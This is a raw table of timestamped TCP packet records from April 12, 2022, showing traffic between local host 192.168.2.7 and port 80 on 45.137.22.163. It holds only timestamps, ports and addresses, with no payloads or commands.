Apr 12, 2022 21:49:22.164855003 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.164880037 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.164935112 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.164963007 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.164988995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165040016 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165060997 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165107965 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165139914 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165174961 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165193081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165247917 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165256977 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165297985 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165358067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165359974 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165397882 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165448904 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165498972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165509939 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165550947 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165601969 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165621996 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165656090 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165704012 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165719032 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165755033 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165806055 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165816069 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165854931 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165905952 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.165910959 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.165956020 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166002989 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166007996 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166059971 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166110992 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166111946 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166188002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166254997 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166256905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166311026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166358948 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166359901 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166409016 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166457891 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166462898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166508913 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166558981 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166559935 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166610003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166656971 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166659117 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166709900 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166758060 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166762114 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166806936 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166856050 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166856050 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166908026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.166956902 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.166958094 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167006969 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167054892 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.167056084 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167119026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167166948 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167169094 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.167216063 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167248964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.167264938 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.189966917 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190009117 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190027952 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190046072 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190063953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190080881 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190098047 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190102100 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190121889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190130949 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190140009 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190157890 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190179110 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190196037 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190201998 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190213919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190232992 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190251112 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190257072 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190268993 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190288067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190294981 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190304995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190321922 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190330029 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190335989 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190354109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190362930 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190373898 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190396070 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190406084 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190414906 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190419912 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190428972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190447092 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190464020 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190483093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190483093 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190500021 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190509081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190517902 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190536976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190553904 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190553904 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190573931 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190573931 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190593004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190610886 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190629005 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190640926 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190645933 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190655947 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190671921 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190679073 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190685987 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190690994 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190709114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190725088 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190733910 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190742970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190754890 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190761089 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190778971 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190795898 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190798044 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190814018 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190830946 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190840006 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190849066 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190860033 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.190871954 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.190916061 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.213753939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213804007 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213860989 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213888884 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213911057 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213924885 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.213939905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213973045 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.213989973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.213994026 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214001894 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214031935 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214061975 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214065075 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214091063 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214118958 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214121103 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214148998 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214179039 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214210987 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214240074 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214262962 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214268923 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214298964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214327097 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214328051 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214359045 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214380980 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214380980 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214411974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214433908 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214456081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214483976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214513063 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214543104 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214553118 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214570999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214581966 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214598894 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214601040 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214631081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214647055 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214659929 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214689016 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214704990 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214716911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214745998 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214761019 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214776039 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214803934 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214819908 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214833975 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214863062 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214875937 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214890003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214919090 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214931965 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.214946985 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214976072 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.214989901 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215004921 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215030909 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215046883 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215059042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215109110 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215145111 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215147018 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215182066 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215192080 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215224028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215260029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215270042 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215326071 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215342999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215383053 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215392113 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215420961 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215456963 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215466976 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215495110 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215529919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215538979 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215567112 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215604067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215636969 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215637922 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215677023 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215683937 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215712070 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215744972 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215749979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215758085 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215790033 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215826035 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215833902 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215862989 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215898991 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215908051 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.215934038 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215970039 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.215976000 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216006041 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216042995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216049910 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216084003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216119051 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216128111 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216156960 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216193914 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216202021 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216229916 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216267109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216272116 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216303110 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216341972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216346025 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216381073 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216417074 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216425896 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216454983 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216491938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216505051 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216526985 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216563940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216571093 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216600895 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216636896 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216675043 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216675997 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216711044 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216720104 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216747999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216784954 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216815948 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216820002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216861010 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216865063 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216917992 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.216964006 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.216967106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.217015028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.217053890 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.217062950 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.217093945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.217123032 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.217149973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.217149973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.217904091 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.218696117 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240027905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240148067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240148067 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240216970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240267038 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240279913 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240346909 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240394115 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240411997 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240474939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240525007 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240689039 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240753889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240809917 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240823030 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240886927 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.240935087 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.240942001 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241000891 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241050005 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241069078 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241148949 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241205931 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241219997 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241281033 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241327047 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241348982 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241415024 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241461039 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241477013 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241542101 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241590023 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241606951 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241668940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241717100 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241743088 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241832972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241885900 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.241895914 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.241960049 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242014885 CEST	49780	80	192.168.2.7	45.137.22.163
